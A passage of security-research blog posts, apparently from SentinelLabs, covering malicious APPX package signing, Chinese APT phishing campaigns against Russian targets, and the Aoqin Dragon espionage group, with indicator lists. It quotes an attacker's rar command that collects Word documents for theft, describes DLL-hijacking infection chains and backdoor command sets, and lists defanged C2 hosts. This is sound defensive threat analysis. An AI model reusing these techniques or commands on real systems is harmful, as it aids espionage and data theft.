APPX packages are ZIP archive files that store the executable files that implement the packaged Windows App and additional files. Figure 2 depicts the content of edge_update.appx. The eediwjus directory stores the malicious Windows App that the executable files eediwjus.exe and eediwjus.dll implement. eediwjus.exe is a .NET Windows App (see Figure 3) that invokes the mhjpfzvitta function from eediwjus.dll. This function executes malicious code that is heavily control-flow obfuscated with unconditional jumps (see Figure 4). The analysis of the malicious code is out of the scope of this article.

Figure 2: The content of edge_update.appx
Figure 3: The implementation of eediwjus.exe
Figure 4: Control-flow obfuscated malicious code in eediwjus.dll

In addition to the files that implement a Windows App, an APPX package stores additional files, such as AppxManifest.xml, AppxBlockMap.xml, and AppxSignature.p7x.

AppxManifest.xml is the package manifest, a file in XML (Extensible Markup Language) format that contains the information that Windows needs to deploy, display, and update a Windows App. This includes information about:

  • The publisher of the App, where the publisher is the entity that digitally signs the APPX package and that is responsible for the development and release of the Windows App.
  • Windows App properties, such as display name and logo.
  • Software dependencies and capabilities: The Windows system controls what system resources a Windows App can access with respect to the capabilities that the publisher has assigned to the App. System resources include the Internet, filesystem locations, and networking. In summary, Windows Apps execute in a sandboxed, access-restricted, environment for security reasons.

Figure 5 depicts the content of AppxManifest.xml in the malicious edge_update.appx. The publisher of the Windows App is Foresee Consulting Inc., the display name of the App is Edge Update, and the App has the capabilities internetClient and runFullTrust . The internetClient capability enables the malicious Windows App to download data from the Internet, probably a payload from an attacker-controlled endpoint.

Figure 5: The content of AppxManifest.xml in edge_update.appx (trimmed for brevity)

AppxBlockMap.xml is the package block map, a file in XML format that stores Base-64 encoded hash values of data blocks in the files that an APPX package archives. Windows uses these hashes to verify the data integrity of these files when installing an APPX package, a topic that I discuss further in this article.

Figure 6 depicts the content of AppxBlockMap.xml in the malicious edge_update.appx. The HashMethod XML attribute specifies the hash algorithm for calculating the data block hash values in AppxBlockMap.xml. The File XML element specifies a file in the APPX package and the size of the file. The Block XML element specifies the hash value and the size of a single data block in the file. For example, a data block in eediwjus.exe that is 1304 bytes big has the SHA-256 hash value of ad4f74c0c3ac37e6f1cf600a96ae203c38341d263dbac0741e602686794c4f5a (in hexadecimal format).

Figure 6: The content of AppxBlockMap.xml in edge_update.appx (trimmed for brevity)

AppxSignature.p7x is the APPX package signature, a PKCS (Public-Key Cryptography Standards) #7 digital signature data in ASN.1 (Abstract Syntax Notation One) format. AppxSignature.p7x stores signature data, such as the certificate chain of the digital signature and the actual signed data. The signed data includes hashes of files in the APPX package, such as AppxManifest.xml and AppxBlockMap.xml. Figure 7 depicts the formatted content of AppxSignature.p7x in the malicious edge_update.appx.

Figure 7: The content of AppxSignature.p7x in edge_update.appx (trimmed for brevity)

Is a Malicious Windows App Trustworthy?

The AppxSvc service (Appx Deployment Service), which the DLL (dynamic-link library) %SystemRoot%\System32\appxdeploymentserver.dll implements, orchestrates the installation of APPX packages. When a user installs an APPX package, the AppxSvc service verifies the data integrity of the package and verifies that the package satisfies certain trust criteria. Figure 8 depicts a simplified overview of the data integrity verification process that the AppxSvc service conducts.

Figure 8: A simplified overview of the data integrity verification process that the AppxSvc service conducts

In summary, the data integrity verification process consists of the following steps:

  1. The AppxSvc service invokes the WinVerifyTrust function to verify the APPX package signature AppxSignature.p7x, that is, to verify the signed data in AppxSignature.p7x using the certificate chain in AppxSignature.p7x (see Figure 7). The signed data includes hashes of files that the APPX package stores, including AppxBlockMap.xml (see Figure 6). For example, Figure 9 depicts the hash value of AppxBlockMap.xml in the malicious edge_update.appx and the same value in AppxSignature.p7x, the package signature of edge_update.appx.


    Figure 9: The hash value of AppxBlockMap.xml in  the package signature of edge_update.appx

  2. The successful verification of the signed data in AppxSignature.p7x enables the AppxSvc service to verify the data integrity of the files whose hashes are part of the signed data, including AppxBlockMap.xml. The AppxSvc service does this by first computing the SHA-256 hash value of AppxBlockMap.xml and then comparing the computed value with the SHA-256 hash value of AppxBlockMap.xml in the previously verified signed data.
  3. Once the AppxSvc service verifies the data integrity of AppxBlockMap.xml, the service verifies the integrity of the data blocks that AppxBlockMap.xml specifies (see Figure 6). The service does this by first computing the hash values of the data blocks and then comparing the computed values with the Base-64 encoded hash values in AppxBlockMap.xml.

The steps above ensure that the data in an APPX package is credible, with the overall process relying on a successful verification of the signed data in AppxSignature.p7x. However, for Windows to install an APPX package, also a malicious package, the system also has to verify that the package satisfies a set of trust criteria.

Previous research provides more background information on the steps above. This article focuses on the trust criteria that relate to the certificates in AppxSignature.p7x that the AppxSvc service uses to verify the signed data in AppxSignature.p7x.

These certificates represent the root of trust for the data integrity verification of an APPX package and for establishing trust in the package. In addition, in contrast to other APPX package-internal data structures for data integrity and trust verification, the certificates are more relevant entities from an operational perspective to end-users.

When the AppxSvc service installs the malicious edge_update.appx, the service executes:

  • The CertVerifyCertificateChainPolicy function to validate the certificates in AppxSignature.p7x against the following certificate validation policies: CERT_CHAIN_POLICY_AUTHENTICODE (2), CERT_CHAIN_POLICY_AUTHENTICODE_TS (3), CERT_CHAIN_POLICY_BASE (1), and CERT_CHAIN_POLICY_BASIC_CONSTRAINTS (5). Among other certificate properties, CertVerifyCertificateChainPolicy validates whether the certificates are valid for code signing and whether the root certificate is trusted – present in a certificate store for trusted root certificates, such as Trusted Root Certification Authorities.
  • The CertGetCertificateChain function to check the revocation status of the certificates in AppxSignature.p7x.

If any validation by CertVerifyCertificateChainPolicy or CertGetCertificateChain fails, the AppxSvc service does not establish trust in the APPX package and terminates the installation of edge_update.appx.

To demonstrate a failed validation by CertVerifyCertificateChainPolicy, Figure 10 depicts a scenario that I crafted: The AppxSvc service executes CertVerifyCertificateChainPolicy to validate the certificates in the package signature of edge_update.appx against the CERT_CHAIN_POLICY_AUTHENTICODE (2) and CERT_CHAIN_POLICY_BASE (1) certificate validation policies. The CERT_CHAIN_POLICY_BASE policy fails the validation of the certificates due to an untrusted root certificate – the root certificate issued by DigiCert Trusted Root G4 is not present in a certificate store for trusted root certificates. This causes the AppxSvc service to terminate the installation of edge_update.appx.


Figure 10: CertVerifyCertificateChainPolicy fails the validation of the certificates in the package signature of edge_update.appx due to an untrusted root certificate

In practice, CertVerifyCertificateChainPolicy successfully validates the certificates in the package signature of the malicious edge_update.appx. This is because the root certificate, which is issued by DigiCert Trusted Root G4, is present in the Trusted Root Certification Authorities certificate store.

Revoked, or Not, That is the Question

The AppxSvc service executes the CertGetCertificateChain function to check the revocation status of the certificates in the package signature of edge_update.appx, starting from the end certificate in the certificate chain – the one issued to Foresee Consulting Inc. (see Figure 11).

Figure 11: The certificate issued to Foresee Consulting Inc. in the context of the CertGetCertificateChain function (in ASN.1 format)

AppxSvc executes CertGetCertificateChain such that the function verifies the revocation status of all certificates in the certificate chain, including the root certificate – the dwFlags parameter of CertGetCertificateChain has the value of 0x20000000 (CERT_CHAIN_REVOCATION_CHECK_CHAIN, see Figure 12).

Figure 12: CertGetCertificateChain verifies the revocation status of all certificates in the certificate chain

Prior to the revocation of the end certificate issued to Foresee Consulting Inc., CertGetCertificateChain did not indicate an issue with the certificate chain in the package signature of edge_update.appx. This resulted in the AppxSvc service completing the installation of the malicious APPX package and therefore compromising the system. Windows places installed Windows Apps in the %ProgramFiles%\WindowsApps directory (see Figure 13).

Figure 13: The AppxSvc service has completed the installation of the malicious edge_update.appx

After the revocation of the end certificate, CertGetCertificateChain indicates that a certificate in the package signature of edge_update.appx has been revoked by storing the CERT_TRUST_IS_REVOKED (0x00000004) error code in a CERT_TRUST_STATUS structure (see Figure 14). This results in the AppxSvc service terminating the installation of the malicious APPX package with an error (see Figure 15).

Figure 14: CertGetCertificateChain stores the CERT_TRUST_IS_REVOKED (0x00000004) error code in a CERT_TRUST_STATUS structure
Figure 15: The AppxSvc service terminates the installation of the malicious edge_update.appx with an error

Recommendations for Users and Administrators

For Windows to install a Windows App that is packaged, for example, into an APPX package, the system first has to establish trust in the package. To this end, Windows verifies the data integrity of the package based on the package signature and evaluates whether the package satisfies certain trust criteria. Some of the trust criteria that relate to the certificates in the package signature are the following:

  • If Windows App sideloading is not enabled on the system, the APPX package must originate from the Microsoft Store and be therefore counter-signed by Microsoft. App sideloading is not enabled by default on recent Windows versions. However, organizations may enable App sideloading on their managed devices or ask customers to turn App sideloading on in order to enable the deployment of Windows Apps built specifically for internal or customer use. These Windows Apps are known as LOB (line-of-business) Windows Apps.
  • If Windows App sideloading is enabled on the system, the APPX package must be signed such that:
    • The system trusts the root certificate of the certificate chain in the signature – the certificate must be present in a certificate store for trusted root certificates.
    • No certificate in the chain is revoked at package installation time.

The majority of the malicious APPX packages that the security community has observed as part of attacks have satisfied the criteria above.

Recommendations for users and administrators for protecting against attacks that involve malware delivery via malicious Windows Apps include the following:

  • For users:
    • Avoid downloading Windows Apps from the Microsoft Store without thoroughly examining relevant information, such as App vendor details, and number and quality of published user reviews. Be careful about typosquatting attempts – malicious Windows Apps with names that are very similar to legitimate, popular Windows Apps. Typosquatting is popular among malicious actors. Attackers have recently managed to plant malicious Windows Apps in the Microsoft Store. In addition, SentinelLabs has recently investigated typosquatting attacks against the crates.io Rust and the PyPI Python software repositories, referred to as CrateDepression and Pymafka.
    • Stay vigilant against phishing attacks and avoid installing software and software updates from unknown sources. Malicious Windows Apps often come under the disguise of critical software updates.
  • For administrators: Malicious actors often use compromised legitimate code signing material, with end certificates that chain to trusted root certificates, to sign malicious Windows Apps. As this article shows, this enables the installation of the malicious App packages on victim systems. Therefore:
    • Make sure that the systems under your management can timely and correctly verify whether a certificate has been revoked. This includes unrestricted access to CRL (Certificate Revocation List) and OCSP (Online Certificate Status Protocol) URLs, and/or up-to-date local CRL and OCSP caches. Certificate revocation is a crucial measure against the malicious Windows App threat.
    • Make sure that the code signing material of your organization is kept secure. This is to prevent malicious actors from distributing malware masquerading as Windows Apps that originate from your organization.

✇SentinelLabs

Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs

By: Tom Hegel

Executive Summary

  • SentinelLabs has identified a new cluster of threat activity targeting Russian organizations.
  • We assess with high-confidence that the threat actor responsible for the attacks is a Chinese state-sponsored cyber espionage group, as also recently noted by Ukraine CERT (CERT-UA).
  • The attacks use phishing emails to deliver Office documents to exploit targets in order to deliver their RAT of choice, most commonly Bisonal.
  • SentinelLabs has also identified associated activity targeting telecommunication organizations in Pakistan leveraging similar attack techniques.

Overview

On June 22nd 2022, CERT-UA publicly released Alert #4860, which contains a collection of documents built with the Royal Road malicious document builder, themed around Russian government interests. SentinelLabs has conducted further analysis of CERT-UA’s findings and has identified supplemental Chinese threat activity.

China’s recent intelligence objectives against Russia can be observed in multiple campaigns following the invasion of Ukraine, such as Scarab, Mustang Panda, ‘Space Pirates’, and now the findings here. ​​Our analysis indicates this is a separate Chinese campaign, but specific actor attribution is unclear at this time.

While the overlap of publicly reported actor names inevitably muddies the picture, it remains clear that the Chinese intelligence apparatus is targeting a wide range of Russian-linked organizations. Our findings currently offer only an incomplete picture of this threat cluster’s phishing activity, but they serve to provide perspective into an attacker’s ongoing operational objectives and a framework for our ongoing research.

Malicious Documents Targeting Russia

On June 22nd , Ukraine’s CERT-UA reported several RTF documents containing malicious code exploiting one or more vulnerabilities in MS Office. CERT-UA assessed that the documents, “Vnimaniyu.doc”, “17.06.2022_Protokol_MRG_Podgruppa_IB.doc”, and “remarks table 20.06.2022_obraza”, were likely built with the Royal Road builder and dropped the Bisonal backdoor. Royal Road is a malicious document builder used widely by Chinese APT groups, while Bisonal is a backdoor RAT unique to Chinese threat actors.

The CERT-UA advisory followed public reporting by our colleagues from nao_sec and Malwarebytes, who identified some of the first indicators and shared related samples and C2 servers. Building off this initial intelligence, SentinelLabs discovered a further related cluster of activity.

Timeline of Royal Road Malicious Documents

As we have observed over the years, Royal Road documents follow content themes relevant to their targets. Following that practice, it’s reasonable to assume that the targets in this recent cluster of activity are likely Russian government organizations.

One example of this cluster (f599ed4ecb6c61ef2f2692d1a083e3bb040f95e6) is a fake document mimicking a RU-CERT memo on increased phishing attacks.

Malicious document mimicking RU-CERT
Malicious document mimicking RU-CERT (Translated)

Another example is themed around telecommunication organizations (415ce2db3957294d73fa832ed844940735120bae).

Malicious Document – Russia Telecom Theme – “Пояснительная записка к ЗНИ.doc”
Malicious Document – Russia Telecom Theme – “Пояснительная записка к ЗНИ.doc” (Translated)

The example documents shown above both exploit CVE-2018-0798, a remote execution vulnerability in Microsoft Office to install the embedded malware.

Attribution to Chinese Threat Groups

The collection of files and infrastructure noted above could be considered related to the Tonto Team APT group (aka “CactusPete”, “Earth Akhlut”), a Chinese threat group that has been reported on for nearly ten years. However, we assess that link with only medium confidence due to the potential for shared attacker resources that could muddy attribution based on the currently available data. Known targets span the globe, with a particular interest in Northeast Asia, including governments, critical infrastructure, and other private businesses.

The attacker continues their long history of Russian targeting; however, the rate of Russian and Russia-relevant targets in recent weeks may indicate increased prioritization.

There are multiple connections of this activity to Chinese threat actors. As noted above, the documents are built with a commonly known malicious document builder used widely by Chinese APT groups, the shared toolkit often referred to as the “Royal Road” or the “8.t” builder.

These documents often contain metadata indicating the document creator’s operating system was using simplified Chinese, a trait we observed in our previous analysis of Scarab APT activity.

The malicious documents are generally used for the delivery of custom malware, such as the Bisonal RAT, which as noted by CERT-UA, is unique to Chinese groups, including Tonto Team. Bisonal has a uniquely long history of use and continued development by its creators, such as expanding features for file searching and exfiltration, anti-analysis and detection techniques, and maintaining generally unrestricted system control.

Additionally, the collection of C2 infrastructure associated with these various samples fall under a larger umbrella of known Chinese APT activity.

Related Activity of Interest

It’s also worth noting that there are still ongoing related attacks focused on non-Russian organizations, such as those against Pakistan.

For example, one file uploaded to VirusTotal (91ca78231bcacab0d5e6194041817b96252e65bf) from Pakistan is a May 2022 email message file to the Pakistan Telecommunication Authority, sent from a potentially compromised account in the Cabinet Division of the Pakistani government. This email contains the Royal Road attachment “Please help to Check.doc” (f444ff2386cd3ada204c3224463f4be310e5554a), dropping 85fac143c52e26c22562b0aaa80ffe649640bd29 and beaconing outbound to instructor.giize[.]com (198.13.56[.]122).

Phishing email containing malicious document

Conclusion

We assess with high confidence that the Royal Road-built malicious documents, delivered malware, and associated infrastructure are attributable to Chinese threat actors. Based on our observations, there’s been a continued effort to target Russian organizations by this cluster through well-known attack methods– the use of malicious documents exploiting n-day vulnerabilities with lures specifically relevant to Russian organizations. Overall, the objectives of these attacks appear espionage-related, but the broader context remains unavailable from our standpoint of external visibility.

Indicators of Compromise

IOC Description
f599ed4ecb6c61ef2f2692d1a083e3bb040f95e6 6/21/2022 Royal Road Document”Вниманию.doc”
cb8eb16d94fd9242baf90abd1ef1a5510edd2996 6/16/2022  Royal Road Document “Вниманию.doc”
41ebc0b36e3e3f16b0a0565f42b0286dd367a352 6/15/2022 (Estimate) Royal Road Document”Анкетирование Агентства по делам государственной службы.rtf”
2abf70f69a289cc99adb5351444a1bd23fd97384 6/20/2022 Royal Road Document”17.06.2022_Протокол_МРГ_Подгруппа_ИБ.doc”
supportteam.lingrevelat[.]com C2 Domain
upportteam.lingrevelat[.]com C2 Domain for cb8eb16d94fd9242baf90abd1ef1a5510edd2996
2b7975e6b1e9b72e9eb06989e5a8b1f6fd9ce027 6/21/2022 Royal Road Document”О_формировании_проекта_ПНС_2022_файл_отображен.doc”
a501fec38f4aca1a57393b6e39a52807a7f071a4 6/21/2022 Royal Road Document”замечания таблица 20.06.2022.doc”
415ce2db3957294d73fa832ed844940735120bae 6/23/2022 Royal Road Document”Пояснительная записка к ЗНИ.doc”
news.wooordhunts[.]com C2 Domain for 415ce2db3957294d73fa832ed844940735120bae
137.220.176[.]165 IP Resolved for C2 Domains news.wooordhunts[.]com supportteam.lingrevelat[.]com upportteam.lingrevelat[.]com
1c848911e6439c14ecc98f2903fc1aea63479a9f 6/23/2022 Royal Road Document”РЭН 2022.doc”
91ca78231bcacab0d5e6194041817b96252e65bf 5/12/2022 Phishing Email File
f444ff2386cd3ada204c3224463f4be310e5554a 5/12/2022 Royal Road Document”Please help to Check.doc”
instructor.giize[.]com C2 Server for f444ff2386cd3ada204c3224463f4be310e5554a

✇SentinelLabs

Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years

By: Joey Chen

Executive Summary

  • Aoqin Dragon, a threat actor SentinelLabs has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
  • Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
  • Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
  • Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential association to UNC94 (Mandiant).

Overview

SentinelLabs has uncovered a cluster of activity beginning at least as far back as 2013 and continuing to the present day, primarily targeting organizations in Southeast Asia and Australia. We assess that the threat actor’s primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. We track this activity as ‘Aoqin Dragon’.

The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread the malware and infect additional targets. Attacks attributable to Aoqin Dragon typically drop one of two backdoors, Mongall and a modified version of the open source Heyoka project.

Threat Actor Infection Chain

Throughout our analysis of Aoqin Dragon campaigns, we observed a clear evolution in their infection chain and TTPs. We divide their infection strategy into three parts.

  1. Using a document exploit and tricking the user into opening a weaponized Word document to install a backdoor.
  2. Luring users into double-clicking a fake Anti-Virus to execute malware in the victim’s host.
  3. Forging a fake removable device to lure users into opening the wrong folder and installing the malware successfully on their system.

Initial Access via Exploitation of Old and Unpatched Vulnerabilities

During 2012 to 2015, Aoqin Dragon relied heavily on CVE-2012-0158 and CVE-2010-3333 to compromise their targets. In 2014, FireEye published a blog detailing related activity using lure documents themed around the disappearance of Malaysia Airlines Flight MH370 to conduct their attacks. Although those vulnerabilities are very old and were patched before being deployed by Aoqin Dragon, this kind of RTF-handling vulnerability decoy was very common in that period.

There are three interesting points that we discovered from these decoy documents. First, most decoy content is themed around targets who are interested in APAC political affairs. Second, the actors made use of lure documents themed to pornographic topics to entice the targets. Third, in many cases, the documents are not specific to one country but rather the entirety of Southeast Asia.

APAC Themed Lure Document

Pornographic-themed Lure Document

Executables Masked With Fake Icons

The threat actor developed executable files masked with document file icons such as Windows folders and Anti-Virus vendor icons, acting as droppers to execute a backdoor and connect to the C2 server. Although executable files with fake file icons have been in use by a variety of actors, it remains an effective tool especially for APT targets. Combined with “interesting” email content and a catchy file name, users can be socially engineered into clicking on the file.

Executable dropper with different fake security product icons

Typically, a script containing a rar command is embedded in the executable dropper with different fake security product icons. Based on the script contained in the executable, we can identify the main target type of document formats they were trying to find, such as Microsoft Word documents.

rar.exe a -apC -r -ed -tk -m5 -dh -tl -hpThis0nePiece -ta20180704 C:\DOCUME~1\ALLUSE~1\DRM\Media\B9CC6F75.ldf C:\*.doc C:\*.DOCX

Moreover, the dropper employs a worm infection strategy using a removable device to carry the malware into the target’s host and facilitate a breach into the secure network environment. We also found the same dropper deploying different backdoors including the Mongall backdoor and a modified Heyoka backdoor.

Removable Device as an Initial Vector

From 2018 to present, this actor has also been observed using a fake removable device as an initial infection vector. Over time, the actor upgraded the malware to protect it from being detected and removed by security products.

Here’s a summary of the attack chain of recent campaigns:

  1. A Removable Disk shortcut file is made which contains a specific path to initiate the malware.
  2. When a user clicks the fake device, it will execute the “Evernote Tray Application” and use DLL hijacking to load the malicious encrashrep.dll loader as explorer.exe.
  3. After executing the loader, it will check if it is in any attached removable devices.
  4. If the loader is not in the removable disk, it will copy all the modules under "%USERPROFILE%\AppData\Roaming\EverNoteService\", which includes normal files, the backdoor loader and an encrypted backdoor payload.
  5. The malware sets the auto start function with the value “EverNoteTrayUService”. When the user restarts the computer, it will execute the “Evernote Tray Application” and use DLL hijacking to load the malicious loader.
  6. The loader will check the file path first and decrypt the payloads. There are two payloads in this attack chain: the first payload is the spreader, which copies all malicious files to removable devices; the second one is an encrypted backdoor which injects itself into rundll32’s memory.
Newest infection chain flow
Using USB shortcut techniques to spread the malware and infect target victims
Use a shortcut file to fake removable disc icon and change Evernote application name to RemovableDisc.exe

The spreader component will try to find the removable device in the victim’s environment. This malware component will copy all the malicious modules to any removable device to spread the malware in the target’s network environment, excluding Drive A. The threat actor names this component “upan”, which we observe in the malware’s PDB strings.

C:\Users\john\Documents\Visual Studio 2010\Projects\upan_dll_test\Debug\upan.pdb

Malware Analysis

Aoqin Dragon rely heavily on the DLL hijacking technique to compromise targets and run their malware of choice. This includes their newest malware loader, Mongall backdoor, and a modified Heyoka backdoor.

DLL-test.dll Loader

The DLL-test.dll loader is notable because it is used to initiate the infection chain. When a victim has been compromised, DLL-test.dll will check that the host drive is not A and test whether the drive is removable media or not. After these checks are complete, the loader opens the Removable Disk folder to simulate normal behavior. It then copies all modules from the removable drive to the “EverNoteService” folder. The loader will set up an auto start for “EverNoteTrayService” as a form of persistence following reboots.

After decrypting the encrypted payload, DLL-test.dll will execute rundll32.exe and run specific export functions. The loader injects the decrypted payload into memory and runs it persistently. The payload we found in this operation included a Mongall backdoor and a modified Heyoka backdoor.

We found that the code injection logic is identical to that in the book WINDOWS黑客编程技术详解 (Windows Hacking Programming Techniques Explained), Chapter 4, Section 3, which describes how to use memory to directly execute a DLL file. We also found the same code on GitHub. A debug string inside the DLL-test loader provides further evidence that this is the source of the code in the malware.

C:\users\john\desktop\af\dll_test_hj3\dll_test\memloaddll.cpp
C:\users\john\desktop\af\dll_test_hj3 -不过uac 不写注册表\dll_test\memloaddll.cpp
C:\users\john\desktop\af\dll_test - upan -单独 - 老黑的版本\dll_test\memloaddll.cpp

As stated above, the debug strings inside DLL-test.dll loader provide interesting information about Aoqin Dragon TTPs. The loaders contain both debug strings and embedded PDB strings that give us further information of this loader’s features and which backdoor will be decrypted. For instance, “DLL_test loader for Mongall”, “DLL_test loader for Mongall but can’t bypass UAC and can’t add itself to registry”, “DLL-test loader for upan component” and “DLL-test for DnsControl”, which is a modified Heyoka backdoor.

C:\Documents and Settings\Owner\桌面\DLL_test\Release\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test_hj3\Debug\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test - upan -单独 - 老黑的版本\Debug\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test - upan -单独 - 老黑的版本\Release\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test_hj3 -不过UAC 不写注册表\Debug\DLL_test.pdb
D:\2018\DnsControl\DNS20180108\DLL_test\Release\DLL_test.pdb

Mongall Backdoor

Mongall is a small backdoor going back to 2013, first described in a report by ESET. According to the report, the threat actor was trying to target the Telecommunications Department and the Vietnamese government. More recently, Aoqin Dragon has been reported targeting Southeast Asia with an upgraded Mongall encryption protocol and Themida packer.

Mongall backdoor has four different mutexes and different notes in each backdoors – notes are shown in the IOC table. Based on the notes, we can estimate malware creation time, intended targets, Mongall backdoor versions and related C2 domain name.

The backdoor mutex and information collection

The actors name this backdoor HJ-client.dll, and the backdoor name matches the PDB strings mentioned earlier. In addition, there are some notes containing “HJ” strings inside the backdoor.

Although Mongall is not particularly feature rich, it is still an effective backdoor. It can create a remote shell, upload files to the victim’s machine and download files to the attacker’s C2. Most important of all, this backdoor embedded three C2 servers for communication. Below is the Mongall backdoor function description and command code.

Mongall backdoor function capability

We discovered that the Mongall backdoor’s network transmission logic could be found on the Chinese Software Developer Network (CSDN). Compared to the old Mongall backdoor, the new version upgrades the encryption mechanism. However, new versions of Mongall still use GET protocol to send the information back with RC4 to encrypt or base64 to encode the victim machine’s information. There is another interesting finding when we analyze Mongall backdoor: the encryption or encode logic is compared to the mutex of Mongall. Here is the table of mutex and transform data logic.

Mutex Algorithm
Flag_Running Base64 (type 3)
Download_Flag Base64 (type 3)
Running_Flag Base64 (type 3)
Flag_Runnimg_2810 Modify base64 (type 2)
Flag_Running_2016 Modify base64 (type 2)
Flag_Running_2014RC4 RC4+base64 (type 1)

Faking a C2 server allowed us to capture Mongall beacon messages and develop a Python decryption script to reveal each version of the message. Alongside this report, we are publicly releasing the script here. Below shows the encrypted strings and description beacon information.

Decrypting the embedded beacon information

Modified Heyoka Backdoor

We also observed another backdoor used by this threat actor. This backdoor is totally different from Mongall, as we found it is based on the Heyoka open source project. Heyoka is a proof-of-concept of an exfiltration tool which uses spoofed DNS requests to create a bidirectional tunnel. The threat actors modified and redesigned this tool to be a custom backdoor using DLL injection technique to deploy it in the victim’s environment. Simplified Chinese characters can be found in its debug log.

Left:the modified backdoor information; Right: the Heyoka source code
Debug information with simplified Chinese characters

This backdoor was named srvdll.dll by its developers. They not only expanded its functionality but also added two hardcoded C2s. The backdoor checks if it is run as system service or not, to make sure it has sufficient privileges and to keep itself persistent. The modified Heyoka backdoor is much more powerful than Mongall. Although both have shell ability, the modified Heyoka backdoor is generally closer to a complete backdoor product. The commands available in the modified Heyoka backdoor are tabulated below.

Command code Description
0x5 open a shell
0x51 get host drive information
0x3 search file function
0x4 input data in an exit file
0x6 create a file
0x7 create a process
0x9 get all process information in this host
0x10 kill process
0x11 create a folder
0x12 delete file or folder
Hardcoded command and control server in modified Heyoka backdoor
Backdoor with the DNS tunneling connection

Attribution

Throughout the analysis of Aoqin Dragon operations, we came across several artifacts linking the activity to a Chinese-speaking APT group as detailed in the following sections.

Infrastructure

One of Mongall’s backdoors was observed by Unit42 in 2015. They claim the president of Myanmar’s website had been used in a watering hole attack on December 24, 2014. The attacker injected a JavaScript file with a malicious iframe to exploit the browsers of website visitors. In addition, they were also aware that another malicious script had been injected into the same website in November 2014, leveraging CVE-2014-6332 to download a trojan horse to the target’s host.

In 2013, there was a News talk about this group and the results of a police investigation. Police retrieved information from the C2 server and phishing mail server operators located in Beijing, China. The two primary backdoors used in this operation have overlapping C2 infrastructure, and most of the C2 servers can be attributed to Chinese-speaking users.

Two major backdoor C2s overlap
C2 attributed to Chinese-speaking users

Targeting and Motives

The targeting of Aoqin Dragon closely aligns with the Chinese government’s political interests. We primarily observed Aoqin Dragon targeting government, education, and telecommunication organizations in Southeast Asia and Australia.

Considering this long-term effort and continuous targeted attacks for the past few years, we assess the threat actor’s motives are espionage-oriented.

Conclusion

Aoqin Dragon is an active cyberespionage group that has been operating for nearly a decade. We have observed the Aoqin Dragon group evolve TTPs several times in order to stay under the radar. We fully expect that Aoqin Dragon will continue conducting espionage operations. In addition, we assess it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and stay longer in their target network. SentinelLabs continues to track this activity cluster to provide insight into their evolution.

Indicators of Compromise

SHA1 Malware Family
a96caf60c50e7c589fefc62d89c27e6ac60cdf2c Mongall
ccccf5e131abe74066b75e8a49c82373414f5d95 Mongall
5408f6281aa32c02e17003e0118de82dfa82081e Mongall
a37bb5caa546bc4d58e264fe55e9e9155f36d9d8 Mongall
779fa3ebfa1af49419be4ae80b54096b5abedbf9 Mongall
2748cbafc7f3c9a3752dc1446ee838c5c5506b23 Mongall
eaf9fbddf357bdcf9a5c7f4ad2b9e5f81f96b6a1 Mongall
6380b7cf83722044558512202634c2ef4bc5e786 Mongall
31cddf48ee612d1d5ba2a7929750dee0408b19c7 Mongall
677cdfd2d686f7148a49897b9f6c377c7d26c5e0 Mongall
911e4e76f3e56c9eccf57e2da7350ce18b488a7f Mongall
c6b061b0a4d725357d5753c48dda8f272c0cf2ae Mongall
dc7436e9bc83deea01e44db3d5dac0eec566b28c Mongall
5cd555b2c5c6f6c6c8ec5a2f79330ec64fab2bb0 Mongall
668180ed487bd3ef984d1b009a89510c42c35d06 Mongall
28a23f1bc69143c224826962f8c50a3cf6df3130 Mongall
ab81f911b1e0d05645e979c82f78d92b0616b111 Mongall
47215f0f4223c1ecf8cdeb847317014dec3450fb Mongall
061439a3c70d7b5c3aed48b342dda9c4ce559ea6 Mongall
aa83d81ab543a576b45c824a3051c04c18d0716a Mongall
43d9d286a38e9703c1154e56bd37c5c399497620 Mongall
435f943d20ab7b3ecc292e5b16683a94e50c617e Mongall
94b486d650f5ca1761ee79cdff36544c0cc07fe9 Mongall
1bef29f2ab38f0219b1dceb5d37b9bda0e9288f5 Mongall
01fb97fbb0b864c62d3a59a10e785592bb26c716 Mongall
03a5bee9e9686c18a4f673aadd1e279f53e1c68f Mongall
1270af048aadcc7a9fc0fd4a82b9864ace0b6fb6 Mongall
e2e7b7ba7cbd96c9eec1bcb16639dec87d06b8dd Mongall
08d22a045f4b16a2939afe029232c6a8f74dcde2 Mongall
96bd0d29c319286afaf35ceece236328109cb660 Mongall
6cd9886fcb0bd3243011a1f6a2d1dc2da9721aec Mongall
271bd3922eafac4199322177c1ae24b1265885e8 Mongall
e966bdb1489256538422a9eb54b94441ddf92efc Mongall
134d5662f909734c1814a5c0b4550e39a99f524b Mongall
93eb2e93972f03d043b6cf0127812fd150ca5ec5 Mongall
a8e7722fba8a82749540392e97a021f7da11a15a Mongall
436a4f88a5c48c9ee977c6fbcc8a6b1cae35d609 Mongall
ab4cd6a3a4c1a89d70077f84f79d5937b31ebe16 Mongall
8340a9bbae0ff573a2ea103d7cbbb34c20b6027d Mongall
31b37127440193b9c8ecabedc214ef51a41b833c Mongall
ed441509380e72961b263d07409ee5987820d7ae Mongall
45d156d2b696338bf557a509eaaca9d4bc34ba4a Mongall
bac8248bb6f4a303d5c4e4ce0cd410dc447951ea Mongall
15350967659da8a57e4d8e19368d785776268a0e Mongall
008dd0c161a0d4042bdeb1f1bd62039a9224b7f0 Mongall
7e1f5f74c1bf2790c8931f578e94c02e791a6f5f Mongall
16a59d124acc977559b3126f9ec93084ca9b76c7 Mongall
38ba46a18669918dea27574da0e0941228427598 Mongall
38ba46a18669918dea27574da0e0941228427598 Mongall
19814580d3a3a87950fbe5a0be226f9610d459ed Mongall
d82ebb851db68bce949ba6151a7063dab26a4d54 Mongall
